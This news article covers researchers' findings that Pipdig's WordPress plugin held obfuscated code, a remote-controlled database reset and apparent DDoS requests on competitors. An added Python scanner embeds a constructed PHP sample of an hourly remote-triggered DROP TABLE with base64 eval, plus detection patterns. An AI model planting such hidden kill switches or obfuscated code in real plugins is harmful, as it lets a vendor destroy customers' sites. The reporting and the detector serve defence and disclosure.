Security researchers found evidence that a Pipdig WordPress plugin contained suspicious code. Although Pipdig denied any wrongdoing, the company removed the questionable code from its plugin and repositories.
Pipdig makes custom themes for WordPress and Blogger, as well as the Pipdig Power Pack (P3) WordPress plugin, which is installed by default along with any WordPress theme. Suspicious code — some of which was obfuscated — found in the Pipdig WordPress plugin pointed to Pipdig being able to remotely reset customer blogs, change passwords or launch distributed denial-of-service (DDoS) attacks on competing sites.
The suspicious code was first reported by Mikey Veenstra, threat analyst at Wordfence, a WordPress security company, and Jem Turner, an independent developer, who conducted independent parallel investigations into Pipdig.
According to both reports, the P3 plugin contained code that uses Pipdig customer sites to issue hourly requests to Pipdig competitors’ sites in an effort to stage low-level DDoS attacks.
Pipdig responded by denying any malicious activity and providing rationales for the plugin having the access it did, but also quietly removed the suspicious code from both the plugin and the company’s code repositories. Veenstra followed up his initial report with more evidence that not only supported his claims, but showed direct contradictions in the Pipdig response.
The starkest contradiction was in Pipdig’s response to the accusation of a kill switch being available to reset a user’s blog.
In Pipdig’s original response posted on March 29, the company said, “There is a function in the plugin which can be used to clear database tables, much like a backup or standard reset plugin. To confirm, we do not have the ability to ‘kill’ a site, nor would we ever, ever want to do that!”
In the follow-up response posted on March 31, Pipdig again asserted the functionality was not a kill switch. But the company admitted “there was a function in an older version of the plugin which could be used to reset a site back to the default settings.” Additionally, it implied the functionality was added in response to an incident in July 2018, in which Pipdig WordPress themes were stolen and resold illegally, and that it was used to reset those unauthorized sites.
However, Veenstra noted some discrepancies, the first of which is that there is no difference between a WordPress site reset to default and one that has been destroyed completely.
“Second, any honest plugin developer providing a legitimate means for a user to destroy their own database (whether that’s a good idea or not is a different story) would leave that choice strictly to the user. Instead of offering a user-facing button surrounded by ‘Are you sure you want to delete this entire database?’ warnings, the P3 plugin silently asks their servers once every hour if the database should be vaporized,” Veenstra wrote in a blog post. “Third, this answer conflicts with the previous one. Is this code for anti-piracy or for a ‘factory reset’? Has it ever been used or not?”
Veenstra said the original commit adding this reset functionality to the P3 plugin was added on Nov. 7, 2017, and was still part of the plugin as of March 25, 2019 — three days before Wordfence notified Pipdig of the issues.
Veenstra noted that he reached out to Pipdig at 12:29 p.m. on March 28, and by 2:30 p.m., most of the offending code was removed from the plugin, although the change log for this new version 4.8.0 was altered to appear as though it was released on March 24. Turner kept a copy of version 4.7.3 of the Pipdig WordPress plugin to verify claims. Additionally, Pipdig removed all code from its public Bitbucket repository on March 31.
Veenstra also found evidence the Pipdig Blogger plugin included obfuscated code similar to the Pipdig WordPress plugin, which would run DDoS attacks on competitors. Pipdig denied any DDoS attacks and claimed the code in question “is used to pass the theme’s license key to an external server.”
According to Veenstra, “None of this statement aligns with the actual behavior of the code.”
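As an added defender-side example, not code from the Wordfence or Turner reports and not Pipdig's own code, the following Python scanner flags the combination the reports describe: an hourly scheduled task that polls a remote server and can drop database tables, plus obfuscated code run through eval. The PHP snippets, hostname and hook names inside it are constructed for illustration.

```python
import re

# Constructed PHP snippet (not Pipdig's code) modelling the behaviour the reports describe:
# an hourly WP-Cron task that asks a remote server whether to wipe the database, plus
# base64-encoded code executed via eval. Hostname and hook names are invented.
SUSPECT_PLUGIN = r'''
<?php
add_action('init', function () {
    if (!wp_next_scheduled('p_hourly_check')) {
        wp_schedule_event(time(), 'hourly', 'p_hourly_check');
    }
});
add_action('p_hourly_check', function () {
    global $wpdb;
    $r = wp_remote_get('https://control.example.invalid/check');
    if (wp_remote_retrieve_body($r) === 'reset') {
        $wpdb->query("DROP TABLE {$wpdb->prefix}posts");
    }
});
eval(base64_decode('ZWNobyAnaGknOw=='));
'''

# Constructed benign plugin: only registers a settings page, no cron, no remote calls.
BENIGN_PLUGIN = r'''
<?php
add_action('admin_menu', function () {
    add_options_page('Theme Settings', 'Theme', 'manage_options', 'theme-settings', 'theme_page');
});
'''

# Each indicator on its own is common in legitimate plugins; the combination is what matters.
INDICATORS = {
    'hourly_cron': re.compile(r"wp_schedule_event\s*\([^;]*['\"]hourly['\"]"),
    'remote_fetch': re.compile(r"wp_remote_(get|post|request)\s*\("),
    'db_destroy': re.compile(r"\$wpdb->query\s*\(\s*[\"'](DROP|TRUNCATE)\s+TABLE", re.I),
    'obfuscation': re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
}

def scan_plugin(source: str) -> dict:
    """Return indicator name -> number of matches in one plugin file's source."""
    return {name: len(rx.findall(source)) for name, rx in INDICATORS.items()}

def risk_findings(source: str) -> list:
    """Combine raw indicators into the findings an auditor would want to review."""
    hits = scan_plugin(source)
    findings = []
    if hits['hourly_cron'] and hits['remote_fetch'] and hits['db_destroy']:
        findings.append('remote-triggered database reset on a schedule')
    if hits['obfuscation']:
        findings.append('obfuscated code executed via eval')
    return findings
```

Run `risk_findings` over each PHP file in a plugin directory; a hit is a prompt for manual review of what the scheduled callback actually does, not proof of malice.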
When Pipdig was contacted for comment, especially on the use of obfuscated code to hide some of this functionality, the company refused to comment and only pointed to its existing blog post, which does not mention obfuscated code.
We obtained a Pipdig support email from Phil Clothier, creative director at Pipdig, informing customers that the company was shutting down its hosting service for WordPress sites because of a “wave of support requests” following the security reports that Pipdig was unable to adequately address. Clothier wrote that Pipdig has arranged to transfer all customer sites to Kualo Ltd., a London-based hosting provider, and apologized for the inconveniences.
“To anyone which we have lost trust with, I deeply apologize for any stress/concern this has caused you,” Clothier wrote. “We will work hard to regain that trust and hopefully we can see you again in future when there is more clarity on events.”
Kualo, however, said via Twitter that Pipdig’s email was “a very premature announcement” and promised to provide more details on the arrangement in the near future.
Nicky Bloor, director of U.K.-based Cognitous Cyber Security, tweeted some of his own investigation into the Pipdig WordPress plugin and noted that Kualo has already begun to disable what it called “suspicious code” being run by Pipdig while Kualo investigates further.
All Rights Reserved, Copyright 2000 – 2022, TechTarget